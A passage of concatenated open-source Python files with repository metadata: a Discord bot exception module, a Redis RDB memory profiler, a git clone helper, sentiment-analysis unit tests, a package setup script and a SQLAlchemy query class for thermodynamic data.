"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zine/plugins/example_remote_auth/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "215269"
},
{
"name": "Python",
"bytes": "1141277"
},
{
"name": "Shell",
"bytes": "231"
}
],
"symlink_target": ""
} |
"""
The MIT License (MIT)
Copyright (c) 2018 tilda
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
# File for custom exceptions
# noinspection PyPackageRequirements
from discord.ext import commands
class PostException(Exception):
"""
    Raised when there's an error in the post()
wrapper
"""
pass
class DBLException(PostException):
"""
Subclass of PostException,
    raised when there's an error while posting to
discordbots.org
"""
pass
class DBotsException(PostException):
"""
Subclass of PostException,
    raised when there's an error while posting to
bots.discord.pw
"""
pass
class DogException(PostException):
"""
Subclass of PostException,
    raised when there's an error while posting to
Datadog
"""
pass
class ServiceError(commands.CommandInvokeError):
"""
Subclass of commands.CommandInvokeError.
Raised whenever a request to a service
returns a failure of some sort.
"""
pass
class NSFWException(commands.CheckFailure):
"""
Subclass of commands.CheckFailure.
Raised whenever a NSFW command is not
executed in a NSFW channel.
"""
pass
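# Minimal usage sketch (an assumption, not lolbot's actual code): a discord.py
# command check that raises NSFWException outside of NSFW channels. The
# attribute lookup is kept defensive on purpose.
def nsfw_channel_only():
    def predicate(ctx):
        # Channels without an NSFW flag are treated as non-NSFW
        if getattr(ctx.channel, 'is_nsfw', lambda: False)():
            return True
        raise NSFWException('This command can only be used in NSFW channels.')
    return commands.check(predicate)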
| {
"content_hash": "f8639adc2cb7952cf423be25cc12a567",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 75,
"avg_line_length": 27.341772151898734,
"alnum_prop": 0.7379629629629629,
"repo_name": "tilda/lolbot",
"id": "2b0fa4c2d7ee8875b003a801122623805ac267bb",
"size": "2160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/errors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "12662"
},
{
"name": "Python",
"bytes": "78292"
},
{
"name": "Shell",
"bytes": "3691"
}
],
"symlink_target": ""
} |
from collections import namedtuple
import random
import json
from rdbtools.parser import RdbCallback
from rdbtools.callbacks import encode_key
ZSKIPLIST_MAXLEVEL=32
ZSKIPLIST_P=0.25
REDIS_SHARED_INTEGERS = 10000
MemoryRecord = namedtuple('MemoryRecord', ['database', 'type', 'key', 'bytes', 'encoding','size', 'len_largest_element'])
class StatsAggregator(object):
def __init__(self, key_groupings = None):
self.aggregates = {}
self.scatters = {}
self.histograms = {}
def next_record(self, record):
self.add_aggregate('database_memory', record.database, record.bytes)
self.add_aggregate('type_memory', record.type, record.bytes)
self.add_aggregate('encoding_memory', record.encoding, record.bytes)
self.add_aggregate('type_count', record.type, 1)
self.add_aggregate('encoding_count', record.encoding, 1)
self.add_histogram(record.type + "_length", record.size)
self.add_histogram(record.type + "_memory", (record.bytes/10) * 10)
if record.type == 'list':
self.add_scatter('list_memory_by_length', record.bytes, record.size)
elif record.type == 'hash':
self.add_scatter('hash_memory_by_length', record.bytes, record.size)
elif record.type == 'set':
self.add_scatter('set_memory_by_length', record.bytes, record.size)
elif record.type == 'sortedset':
self.add_scatter('sortedset_memory_by_length', record.bytes, record.size)
elif record.type == 'string':
self.add_scatter('string_memory_by_length', record.bytes, record.size)
else:
raise Exception('Invalid data type %s' % record.type)
def add_aggregate(self, heading, subheading, metric):
if not heading in self.aggregates :
self.aggregates[heading] = {}
if not subheading in self.aggregates[heading]:
self.aggregates[heading][subheading] = 0
self.aggregates[heading][subheading] += metric
def add_histogram(self, heading, metric):
if not heading in self.histograms:
self.histograms[heading] = {}
if not metric in self.histograms[heading]:
self.histograms[heading][metric] = 1
else :
self.histograms[heading][metric] += 1
def add_scatter(self, heading, x, y):
if not heading in self.scatters:
self.scatters[heading] = []
self.scatters[heading].append([x, y])
def get_json(self):
return json.dumps({"aggregates":self.aggregates, "scatters":self.scatters, "histograms":self.histograms})
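        # Shape of the JSON produced above (all values illustrative):
        #   {"aggregates": {"type_memory": {"hash": 2048}, "type_count": {"hash": 3}, ...},
        #    "scatters": {"hash_memory_by_length": [[2048, 12], ...], ...},
        #    "histograms": {"hash_length": {"12": 3}, ...}}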
class PrintAllKeys(object):
def __init__(self, out):
self._out = out
self._out.write("%s,%s,%s,%s,%s,%s,%s\n" % ("database", "type", "key",
"size_in_bytes", "encoding", "num_elements", "len_largest_element"))
def next_record(self, record) :
self._out.write("%d,%s,%s,%d,%s,%d,%d\n" % (record.database, record.type, encode_key(record.key),
record.bytes, record.encoding, record.size, record.len_largest_element))
class MemoryCallback(RdbCallback):
'''Calculates the memory used if this rdb file were loaded into RAM
The memory usage is approximate, and based on heuristics.
'''
def __init__(self, stream, architecture):
self._stream = stream
self._dbnum = 0
self._current_size = 0
self._current_encoding = None
self._current_length = 0
self._len_largest_element = 0
if architecture == 64 or architecture == '64':
self._pointer_size = 8
elif architecture == 32 or architecture == '32':
self._pointer_size = 4
def start_rdb(self):
pass
def start_database(self, db_number):
self._dbnum = db_number
def end_database(self, db_number):
pass
def end_rdb(self):
pass
def set(self, key, value, expiry, info):
self._current_encoding = info['encoding']
size = self.sizeof_string(key) + self.sizeof_string(value) + self.top_level_object_overhead()
size += 2*self.robj_overhead()
size += self.key_expiry_overhead(expiry)
length = element_length(value)
record = MemoryRecord(self._dbnum, "string", key, size, self._current_encoding, length, length)
self._stream.next_record(record)
self.end_key()
def start_hash(self, key, length, expiry, info):
self._current_encoding = info['encoding']
self._current_length = length
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'hashtable':
size += self.hashtable_overhead(length)
else:
raise Exception('start_hash', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def hset(self, key, field, value):
if(element_length(field) > self._len_largest_element) :
self._len_largest_element = element_length(field)
if(element_length(value) > self._len_largest_element) :
self._len_largest_element = element_length(value)
if self._current_encoding == 'hashtable':
self._current_size += self.sizeof_string(field)
self._current_size += self.sizeof_string(value)
self._current_size += self.hashtable_entry_overhead()
self._current_size += 2*self.robj_overhead()
def end_hash(self, key):
record = MemoryRecord(self._dbnum, "hash", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_set(self, key, cardinality, expiry, info):
# A set is exactly like a hashmap
self.start_hash(key, cardinality, expiry, info)
def sadd(self, key, member):
if(element_length(member) > self._len_largest_element) :
self._len_largest_element = element_length(member)
if self._current_encoding == 'hashtable':
self._current_size += self.sizeof_string(member)
self._current_size += self.hashtable_entry_overhead()
self._current_size += self.robj_overhead()
def end_set(self, key):
record = MemoryRecord(self._dbnum, "set", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_list(self, key, length, expiry, info):
self._current_length = length
self._current_encoding = info['encoding']
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'linkedlist':
size += self.linkedlist_overhead()
else:
raise Exception('start_list', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def rpush(self, key, value) :
if(element_length(value) > self._len_largest_element) :
self._len_largest_element = element_length(value)
if self._current_encoding == 'linkedlist':
self._current_size += self.sizeof_string(value)
self._current_size += self.linkedlist_entry_overhead()
self._current_size += self.robj_overhead()
def end_list(self, key):
record = MemoryRecord(self._dbnum, "list", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def start_sorted_set(self, key, length, expiry, info):
self._current_length = length
self._current_encoding = info['encoding']
size = self.sizeof_string(key)
size += 2*self.robj_overhead()
size += self.top_level_object_overhead()
size += self.key_expiry_overhead(expiry)
if 'sizeof_value' in info:
size += info['sizeof_value']
elif 'encoding' in info and info['encoding'] == 'skiplist':
size += self.skiplist_overhead(length)
else:
raise Exception('start_sorted_set', 'Could not find encoding or sizeof_value in info object %s' % info)
self._current_size = size
def zadd(self, key, score, member):
if(element_length(member) > self._len_largest_element):
self._len_largest_element = element_length(member)
if self._current_encoding == 'skiplist':
self._current_size += 8 # self.sizeof_string(score)
self._current_size += self.sizeof_string(member)
self._current_size += 2*self.robj_overhead()
self._current_size += self.skiplist_entry_overhead()
def end_sorted_set(self, key):
record = MemoryRecord(self._dbnum, "sortedset", key, self._current_size, self._current_encoding, self._current_length, self._len_largest_element)
self._stream.next_record(record)
self.end_key()
def end_key(self):
self._current_encoding = None
self._current_size = 0
self._len_largest_element = 0
def sizeof_string(self, string):
# See struct sdshdr over here https://github.com/antirez/redis/blob/unstable/src/sds.h
# int len : 4 bytes
# int free : 4 bytes
# char buf[] : size will be the length of the string
# 1 extra byte is used to store the null character at the end of the string
# Redis internally stores integers as a long
# Integers less than REDIS_SHARED_INTEGERS are stored in a shared memory pool
try:
num = int(string)
if num < REDIS_SHARED_INTEGERS :
return 0
else :
return 8
except ValueError:
pass
return len(string) + 8 + 1 + self.malloc_overhead()
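        # Worked examples (assuming 64-bit pointers, i.e. malloc_overhead() == 8):
        #   sizeof_string('abc')   -> 3 + 8 + 1 + 8 = 20
        #   sizeof_string('123')   -> 0 (shared integer pool, 123 < REDIS_SHARED_INTEGERS)
        #   sizeof_string('99999') -> 8 (stored internally as a long)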
def top_level_object_overhead(self):
# Each top level object is an entry in a dictionary, and so we have to include
# the overhead of a dictionary entry
return self.hashtable_entry_overhead()
def key_expiry_overhead(self, expiry):
# If there is no expiry, there isn't any overhead
if not expiry:
return 0
# Key expiry is stored in a hashtable, so we have to pay for the cost of a hashtable entry
# The timestamp itself is stored as an int64, which is a 8 bytes
return self.hashtable_entry_overhead() + 8
def hashtable_overhead(self, size):
# See https://github.com/antirez/redis/blob/unstable/src/dict.h
# See the structures dict and dictht
# 2 * (3 unsigned longs + 1 pointer) + 2 ints + 2 pointers
# = 56 + 4 * sizeof_pointer()
#
# Additionally, see **table in dictht
# The length of the table is the next power of 2
# When the hashtable is rehashing, another instance of **table is created
# We are assuming 0.5 percent probability of rehashing, and so multiply
# the size of **table by 1.5
return 56 + 4*self.sizeof_pointer() + self.next_power(size)*self.sizeof_pointer()*1.5
def hashtable_entry_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/dict.h
# Each dictEntry has 3 pointers
return 3*self.sizeof_pointer()
def linkedlist_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/adlist.h
# A list has 5 pointers + an unsigned long
return 8 + 5*self.sizeof_pointer()
def linkedlist_entry_overhead(self):
# See https://github.com/antirez/redis/blob/unstable/src/adlist.h
# A node has 3 pointers
return 3*self.sizeof_pointer()
def skiplist_overhead(self, size):
return 2*self.sizeof_pointer() + self.hashtable_overhead(size) + (2*self.sizeof_pointer() + 16)
def skiplist_entry_overhead(self):
return self.hashtable_entry_overhead() + 2*self.sizeof_pointer() + 8 + (self.sizeof_pointer() + 8) * self.zset_random_level()
def robj_overhead(self):
return self.sizeof_pointer() + 8
def malloc_overhead(self):
return self.size_t()
def size_t(self):
return self.sizeof_pointer()
def sizeof_pointer(self):
return self._pointer_size
def next_power(self, size):
power = 1
while (power <= size) :
power = power << 1
        return power
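        # Worked examples: next_power(0) -> 1, next_power(4) -> 8,
        # next_power(5) -> 8, next_power(1000) -> 1024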
def zset_random_level(self):
level = 1
rint = random.randint(0, 0xFFFF)
while (rint < ZSKIPLIST_P * 0xFFFF):
level += 1
rint = random.randint(0, 0xFFFF)
if level < ZSKIPLIST_MAXLEVEL :
return level
else:
return ZSKIPLIST_MAXLEVEL
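        # The loop above mirrors Redis' zslRandomLevel(): each extra level is kept with
        # probability ZSKIPLIST_P (0.25), so the expected number of levels per skiplist
        # entry is about 1 / (1 - 0.25) ~= 1.33, capped at ZSKIPLIST_MAXLEVEL.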
def element_length(element):
if isinstance(element, int):
return 8
if isinstance(element, long):
return 16
else:
return len(element)
| {
"content_hash": "a3cbf31effd877c2e6aabd5ad845441c",
"timestamp": "",
"source": "github",
"line_count": 339,
"max_line_length": 153,
"avg_line_length": 40.448377581120944,
"alnum_prop": 0.5977975495915986,
"repo_name": "svolle/redis-rdb-tools",
"id": "3ade7e32d40e8f42beac2407c2dab456f1304045",
"size": "13712",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdbtools/memprofiler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88817"
}
],
"symlink_target": ""
} |
import os
import option
import utility
import grapeMenu
import grapeGit as git
import grapeConfig
class Clone(option.Option):
""" grape-clone
Clones a git repo and configures it for use with git.
Usage: grape-clone <url> <path> [--recursive] [--allNested]
Arguments:
<url> The URL of the remote repository
<path> The directory where you want to clone the repo to.
Options:
--recursive Recursively clone submodules.
--allNested Get all nested subprojects.
"""
def __init__(self):
super(Clone, self).__init__()
self._key = "clone"
self._section = "Getting Started"
#Clones the default repo into a new local repo
def description(self):
return "Clone a repo and configure it for grape"
def execute(self, args):
remotepath = args["<url>"]
destpath = args["<path>"]
rstr = "--recursive" if args["--recursive"] else ""
utility.printMsg("Cloning %s into %s %s" % (remotepath, destpath, "recursively" if args["--recursive"] else ""))
git.clone(" %s %s %s" % (rstr, remotepath, destpath))
utility.printMsg("Clone succeeded!")
os.chdir(destpath)
grapeConfig.read()
# ensure you start on a reasonable publish branch
menu = grapeMenu.menu()
config = grapeConfig.grapeConfig()
publicBranches = config.getPublicBranchList()
if publicBranches:
if "develop" in publicBranches:
initialBranch = "develop"
elif "master" in publicBranches:
initialBranch = "master"
else:
initialBranch = publicBranches[0]
menu.applyMenuChoice("checkout", args=[initialBranch])
if args["--allNested"]:
configArgs = ["--uv","--uvArg=--allNestedSubprojects"]
else:
configArgs = []
return menu.applyMenuChoice("config", configArgs)
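    # Example invocation (illustrative; the URL and path are placeholders):
    #   grape-clone ssh://git@example.com/project.git project --recursive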
def setDefaultConfig(self, config):
pass
| {
"content_hash": "dc1aa347eaf388b655c7946e0d462b2a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 31.181818181818183,
"alnum_prop": 0.5889212827988338,
"repo_name": "robinson96/GRAPE",
"id": "530ebd58aea0c6b33d05245813f2f54d1c4a046b",
"size": "2058",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vine/clone.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "5564"
},
{
"name": "Python",
"bytes": "1374602"
},
{
"name": "Shell",
"bytes": "24573"
}
],
"symlink_target": ""
} |
import sentimentFilteredTweets
import getEntities
import spacy
from spacy.en import English
import unittest
class TestUM(unittest.TestCase):
parser = English()
def setUp(self):
pass
def test_polarityscore(self):
actual_value = sentimentFilteredTweets.getPolarityScores("RT @ANI_news: Terrorists attack police party at Zadibal police station in Srinagar. More details awaited")
expected_value = {'neg': 0.385, 'neu': 0.494, 'pos': 0.121, 'compound': -0.7076}
self.assertEqual(actual_value, expected_value )
def test_polarityscore1(self):
actual_value = sentimentFilteredTweets.getPolarityScores("Congrats #RCB :) #IPL2016 #RCBvsDD #ViratKholi https://t.co/Na7G9e7Uda")
expected_value = {'neg': 0.0, 'neu': 0.439, 'pos': 0.561, 'compound': 0.7506}
self.assertEqual(actual_value, expected_value )
def test_polarityscore2(self):
actual_value = sentimentFilteredTweets.getPolarityScores("Pakistan denounces US drone attack as violation of sovereignty https://t.co/nP6A41WYKN")
expected_value = {'neg': 0.568, 'neu': 0.432, 'pos': 0.0, 'compound': -0.8481}
self.assertEqual(actual_value, expected_value )
def test_sentiment(self):
polarityscore = {'neg': 0.522, 'neu': 0.437, 'pos': 0.041, 'compound': -0.9552}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'negative'
self.assertEqual(actual_value, expected_value )
def test_sentiment1(self):
polarityscore = {'neg': 0.385, 'neu': 0.494, 'pos': 0.121, 'compound': -0.7076}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'neutral'
self.assertEqual(actual_value, expected_value )
def test_sentiment2(self):
polarityscore = {'neg': 0.0, 'neu': 0.439, 'pos': 0.561, 'compound': 0.7506}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'positive'
self.assertEqual(actual_value, expected_value )
def test_sentiment3(self):
polarityscore = {'neg': 0.568, 'neu': 0.432, 'pos': 0.0, 'compound': -0.8481}
actual_value = sentimentFilteredTweets.getSentiment(polarityscore)
expected_value = 'negative'
self.assertEqual(actual_value, expected_value )
def test_getEntities(self):
tweet = unicode('I wanna be a professional killer Like John Wick yeah')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'I': 'PRP', 'Wick': 'NNP', 'John': 'NNP', 'killer': 'NN'}
self.assertEqual(actual_value,expected_value)
def test_getEntities1(self):
tweet = unicode('James Bond is extraordinary character')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'James': 'NNP', 'character': 'NN', 'Bond': 'NNP'}
self.assertEqual(actual_value,expected_value)
def test_getEntities2(self):
tweet = unicode('OpenMinted will create a readable summary of licenses and a harmonized vocabulary for text miners - Penny Labropoulou')
xEntities = {}
actual_value = getEntities.getEntities(TestUM.parser,tweet,xEntities)
expected_value = {'OpenMinted': 'NNP', 'vocabulary': 'NN', 'text': 'NN', 'Penny': 'NNP', 'summary': 'NN', 'Labropoulou': 'NNP'}
self.assertEqual(actual_value,expected_value)
if __name__ == '__main__':
unittest.main() | {
"content_hash": "ea371736725be441ddfacf4a967be30f",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 166,
"avg_line_length": 42.58441558441559,
"alnum_prop": 0.7197316254955779,
"repo_name": "project-spinoza-dev/tsakpy",
"id": "b265e17ee62eface21acc32cd0f3d6cb4d1e283c",
"size": "3279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/tsaktest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "575"
},
{
"name": "Python",
"bytes": "9297"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
setup(
name='ris.clickatellhttp',
version='0.0.5',
description='Python implementation of the HTTP API for Clickatell SMS gateway',
url='https://github.com/rwizi/clickatellhttp',
license='Apache',
author='Rwizi Information Systems',
author_email='[email protected]',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Communications',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
keywords='ris clickatell sms gateway',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
)
| {
"content_hash": "aff77deae74bfc174690685ba682da1f",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 83,
"avg_line_length": 28.857142857142858,
"alnum_prop": 0.6336633663366337,
"repo_name": "rwizi/clickatellhttp",
"id": "af778218dec7c6a2a970a40a955c65779ea740b1",
"size": "808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9939"
}
],
"symlink_target": ""
} |
from .stage03_quantification_dG_f_postgresql_models import *
#SBaaS base
from SBaaS_base.sbaas_base import sbaas_base
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
#other
class stage03_quantification_dG_f_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for data_stage03_quantification_dG_f
'''
tables_supported = {'data_stage03_quantification_dG0_f':data_stage03_quantification_dG0_f,
'data_stage03_quantification_dG_f':data_stage03_quantification_dG_f,
};
self.set_supportedTables(tables_supported);
## Query from data_stage03_quantification_dG0_f
    # query rows from data_stage03_quantification_dG0_f
def get_rows_dataStage03QuantificationDG0f(self):
        '''Query rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
row_tmp = {
'reference_id':d.reference_id,
'met_name':d.met_name,
'met_id':d.met_id,
'KEGG_ID':d.KEGG_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units,
'temperature':d.temperature,
'temperature_units':d.temperature_units,
'ionic_strength':d.ionic_strength,
'ionic_strength_units':d.ionic_strength_units,
'pH':d.pH,
'pH_units':d.pH_units,
'used_':d.used_,
'comments_':d.comments_};
rows_O.append(row_tmp);
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rowsDict_dataStage03QuantificationDG0f(self):
        '''Query rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.used_.is_(True)).all();
rows_O = {};
if data:
for d in data:
if d.KEGG_id in rows_O:
rows_O[d.KEGG_id].append({
'reference_id':d.reference_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units});
else:
rows_O[d.KEGG_id] = [];
rows_O[d.KEGG_id].append({
'reference_id':d.reference_id,
'priority':d.priority,
'dG0_f':d.dG0_f,
'dG0_f_var':d.dG0_f_var,
'dG0_f_units':d.dG0_f_units});
return rows_O;
except SQLAlchemyError as e:
print(e);
## Query from data_stage03_quantification_dG_f
# query rows from data_stage03_quantification_dG_f
def get_rows_experimentIDAndModelIDAndTimePointAndSampleNameAbbreviations_dataStage03QuantificationDGf(self,experiment_id_I,model_id_I,time_point_I,sample_name_abbreviation_I):
'''Query rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG_f).filter(
data_stage03_quantification_dG_f.model_id.like(model_id_I),
data_stage03_quantification_dG_f.time_point.like(time_point_I),
data_stage03_quantification_dG_f.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I),
data_stage03_quantification_dG_f.measured.is_(True),
data_stage03_quantification_dG_f.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
data_tmp = {'experiment_id':d.experiment_id,
'model_id':d.model_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'met_name':d.met_name,
'met_id':d.met_id,
'dG_f':d.dG_f,
'dG_f_var':d.dG_f_var,
'dG_f_units':d.dG_f_units,
'dG_f_lb':d.dG_f_lb,
'dG_f_ub':d.dG_f_ub,
'temperature':d.temperature,
'temperature_units':d.temperature_units,
'ionic_strength':d.ionic_strength,
'ionic_strength_units':d.ionic_strength_units,
'pH':d.pH,
'pH_units':d.pH_units,
'measured':d.measured,
'used_':d.used_,
'comment_':d.comment_};
rows_O.append(data_tmp);
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rowsDict_experimentIDAndModelIDAndTimePointAndSampleNameAbbreviations_dataStage03QuantificationDGf(self,experiment_id_I,model_id_I,time_point_I,sample_name_abbreviation_I):
        '''Query rows that are used'''
try:
data = self.session.query(data_stage03_quantification_dG_f).filter(
data_stage03_quantification_dG_f.model_id.like(model_id_I),
data_stage03_quantification_dG_f.time_point.like(time_point_I),
data_stage03_quantification_dG_f.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I),
data_stage03_quantification_dG_f.measured.is_(True),
data_stage03_quantification_dG_f.used_.is_(True)).all();
rows_O = {};
if data:
for d in data:
if d.met_id in rows_O:
print('duplicate met_ids found!');
else:
rows_O[d.met_id]={'dG_f':d.dG_f,
'dG_f_var':d.dG_f_var,
'dG_f_units':d.dG_f_units,
'dG_f_lb':d.dG_f_lb,
'dG_f_ub':d.dG_f_ub};
return rows_O;
except SQLAlchemyError as e:
print(e);
def add_dataStage03QuantificationDGf(self, data_I):
'''add rows of data_stage03_quantification_dG_f'''
if data_I:
for d in data_I:
try:
data_add = data_stage03_quantification_dG_f(d
#d['experiment_id'],
#d['model_id'],
#d['sample_name_abbreviation'],
#d['time_point'],
#d['met_name'],
#d['met_id'],
#d['dG_f'],
#d['dG_f_units'],
#d['dG_f_lb'],
#d['dG_f_ub'],
#d['temperature'],
#d['temperature_units'],
#d['ionic_strength'],
#d['ionic_strength_units'],
#d['pH'],
#d['pH_units'],
#d['measured'],
#d['used_'],
#d['comment_']
);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage03QuantificationDGf(self,data_I):
#Not yet tested
'''update rows of data_stage03_quantification_dG_f'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage03_quantification_dG_f).filter(
                        data_stage03_quantification_dG_f.id.like(d['id'])).update(
{'experiment_id':d['experiment_id'],
'model_id':d['model_id'],
'sample_name_abbreviation':d['sample_name_abbreviation'],
'time_point':d['time_point'],
'met_name':d['met_name'],
'met_id':d['met_id'],
'dG_f':d['dG_f'],
'dG_f_units':d['dG_f_units'],
'dG_f_lb':d['dG_f_lb'],
'dG_f_ub':d['dG_f_ub'],
'temperature':d['temperature'],
'temperature_units':d['temperature_units'],
'ionic_strength':d['ionic_strength'],
'ionic_strength_units':d['ionic_strength_units'],
'pH':d['pH'],
'pH_units':d['pH_units'],
'measured':d['measured'],
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def add_dataStage03QuantificationDG0f(self, data_I):
'''add rows of data_stage03_quantification_dG0_f'''
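        # data_I is expected to be a dict keyed by KEGG compound id, each value a
        # list of reference entries, e.g. (values illustrative):
        #   {'C00002': [{'source': 'group_contribution', 'priority': 2,
        #                'dG0_f': -2771.0, 'dG0_f_var': 1.9, 'dG0_f_units': 'kJ/mol'}]}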
if data_I:
#for d in data_I:
# try:
# data_add = data_stage03_quantification_dG0_f(d['reference_id'],
# d['met_name'],
# d['met_id'],
# d['KEGG_id'],
# d['priority'],
# d['dG0_f'],
# d['dG0_f_units'],
# d['temperature'],
# d['temperature_units'],
# d['ionic_strength'],
# d['ionic_strength_units'],
# d['pH'],
# d['pH_units'],
# d['used_'],
# d['comment_']);
# self.session.add(data_add);
# except SQLAlchemyError as e:
# print(e);
for k,v in data_I.items():
for d in v:
try:
data_add = data_stage03_quantification_dG0_f(d['source'],
None,
None,
k,
d['priority'],
d['dG0_f'],
d['dG0_f_var'],
d['dG0_f_units'],
298.15,
'K',
0.0,
'M',
0.0,
None,
True,
None);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage03QuantificationDG0f(self,data_I):
#Not yet tested
'''update rows of data_stage03_quantification_dG0_f'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage03_quantification_dG0_f).filter(
data_stage03_quantification_dG0_f.id.like(d['id'])).update(
{'reference_id':d['reference_id'],
'met_name':d['met_name'],
'met_id':d['met_id'],
'KEGG_id':d['KEGG_id'],
'priority':d['priority'],
'dG0_f':d['dG0_f'],
'dG0_f_var':d['dG0_f_var'],
'dG0_f_units':d['dG0_f_units'],
'temperature':d['temperature'],
'temperature_units':d['temperature_units'],
'ionic_strength':d['ionic_strength'],
'ionic_strength_units':d['ionic_strength_units'],
'pH':d['pH'],
'pH_units':d['pH_units'],
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def drop_dataStage03_quantification_dG_f(self):
try:
data_stage03_quantification_dG0_f.__table__.drop(self.engine,True);
data_stage03_quantification_dG_f.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage03_quantification_dG0_f(self):
try:
reset = self.session.query(data_stage03_quantification_dG0_f).delete(synchronize_session=False);
except SQLAlchemyError as e:
print(e);
def reset_dataStage03_quantification_dG_f(self,experiment_id_I = None,simulation_id_I=None):
try:
if experiment_id_I:
reset = self.session.query(data_stage03_quantification_dG_f).filter(data_stage03_quantification_dG_f.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
else:
reset = self.session.query(data_stage03_quantification_dG_f).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def initialize_dataStage03_quantification_dG_f(self):
try:
data_stage03_quantification_dG0_f.__table__.create(self.engine,True);
data_stage03_quantification_dG_f.__table__.create(self.engine,True);
